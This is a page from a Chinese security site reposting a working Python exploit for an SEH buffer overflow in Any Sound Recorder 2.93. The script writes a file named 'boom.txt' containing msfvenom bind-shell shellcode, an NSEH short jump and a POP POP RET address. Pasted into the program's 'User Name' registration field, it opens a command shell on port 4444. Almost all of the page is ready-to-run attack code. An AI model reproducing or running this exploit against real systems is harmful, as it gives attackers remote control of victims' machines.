首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Any Sound Recorder 2.93 Buffer Overflow
来源:vfocus.net 作者:Abdullah 发布时间:2018-10-18  
# Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH)
# Exploit Author: Abdullah Alic
# Discovery Date: 2018-10-16
# Homepage: http://www.any-sound-recorder.com
# Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: 2.93 
# Tested on: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# with the name "boom.txt". Copy the content of the  "boom.txt". 
# Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register" 
# Connect victim machine on port 4444
 
#!/usr/bin/python 
 
#Payload size: 355 bytes
#msfvenom -p windows/shell_bind_tcp  -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xb8\x67\x21\x25\x53\xdd\xc0\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x8c\xdd\xc7"
buf += "\xa6\xae\xf6\x8a\x49\x4e\x07\xeb\xc0\xab\x36\x2b\xb6"
buf += "\xb8\x69\x9b\xbc\xec\x85\x50\x90\x04\x1d\x14\x3d\x2b"
buf += "\x96\x93\x1b\x02\x27\x8f\x58\x05\xab\xd2\x8c\xe5\x92"
buf += "\x1c\xc1\xe4\xd3\x41\x28\xb4\x8c\x0e\x9f\x28\xb8\x5b"
buf += "\x1c\xc3\xf2\x4a\x24\x30\x42\x6c\x05\xe7\xd8\x37\x85"
buf += "\x06\x0c\x4c\x8c\x10\x51\x69\x46\xab\xa1\x05\x59\x7d"
buf += "\xf8\xe6\xf6\x40\x34\x15\x06\x85\xf3\xc6\x7d\xff\x07"
buf += "\x7a\x86\xc4\x7a\xa0\x03\xde\xdd\x23\xb3\x3a\xdf\xe0"
buf += "\x22\xc9\xd3\x4d\x20\x95\xf7\x50\xe5\xae\x0c\xd8\x08"
buf += "\x60\x85\x9a\x2e\xa4\xcd\x79\x4e\xfd\xab\x2c\x6f\x1d"
buf += "\x14\x90\xd5\x56\xb9\xc5\x67\x35\xd6\x2a\x4a\xc5\x26"
buf += "\x25\xdd\xb6\x14\xea\x75\x50\x15\x63\x50\xa7\x5a\x5e"
buf += "\x24\x37\xa5\x61\x55\x1e\x62\x35\x05\x08\x43\x36\xce"
buf += "\xc8\x6c\xe3\x7b\xc0\xcb\x5c\x9e\x2d\xab\x0c\x1e\x9d"
buf += "\x44\x47\x91\xc2\x75\x68\x7b\x6b\x1d\x95\x84\x82\x82"
buf += "\x10\x62\xce\x2a\x75\x3c\x66\x89\xa2\xf5\x11\xf2\x80"
buf += "\xad\xb5\xbb\xc2\x6a\xba\x3b\xc1\xdc\x2c\xb0\x06\xd9"
buf += "\x4d\xc7\x02\x49\x1a\x50\xd8\x18\x69\xc0\xdd\x30\x19"
buf += "\x61\x4f\xdf\xd9\xec\x6c\x48\x8e\xb9\x43\x81\x5a\x54"
buf += "\xfd\x3b\x78\xa5\x9b\x04\x38\x72\x58\x8a\xc1\xf7\xe4"
buf += "\xa8\xd1\xc1\xe5\xf4\x85\x9d\xb3\xa2\x73\x58\x6a\x05"
buf += "\x2d\x32\xc1\xcf\xb9\xc3\x29\xd0\xbf\xcb\x67\xa6\x5f"
buf += "\x7d\xde\xff\x60\xb2\xb6\xf7\x19\xae\x26\xf7\xf0\x6a"
buf += "\x56\xb2\x58\xda\xff\x1b\x09\x5e\x62\x9c\xe4\x9d\x9b"
buf += "\x1f\x0c\x5e\x58\x3f\x65\x5b\x24\x87\x96\x11\x35\x62"
buf += "\x98\x86\x36\xa7"
 
junk = 10000
nseh= "\xeb\x06\x90\x90" # SHORT JMP 6 bytes 
seh= "\x35\x2f\xd1\x72"  # 0x72d12f35 : pop ebx # pop ebp # ret 0x0c  FROM msacm32.drv
 
buffer = "\x90" * 900 + nseh + seh + buf + "\x90" * (junk-len(buf))
payload = buffer
 
#badchars \x00 \x0a \x0d
 
try:
    f=open("boom.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Academic Timetable Final Build
·Git Submodule Arbitrary Code E
·FLIR Brickstream 3D+ - RTSP St
·libSSH - Authentication Bypass
·FLIR AX8 Thermal Camera 1.32.1
·Microsoft Windows SetImeInfoEx
·Snes9K 0.0.9z - Buffer Overflo
·Modbus Poll 7.2.2 - Denial of
·Solaris RSH Stack Clash Privil
·Microsoft Windows 10 UAC Bypas
·NoMachine 5.3.26 Remote Code E
·AudaCity 2.3 - Denial of Servi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved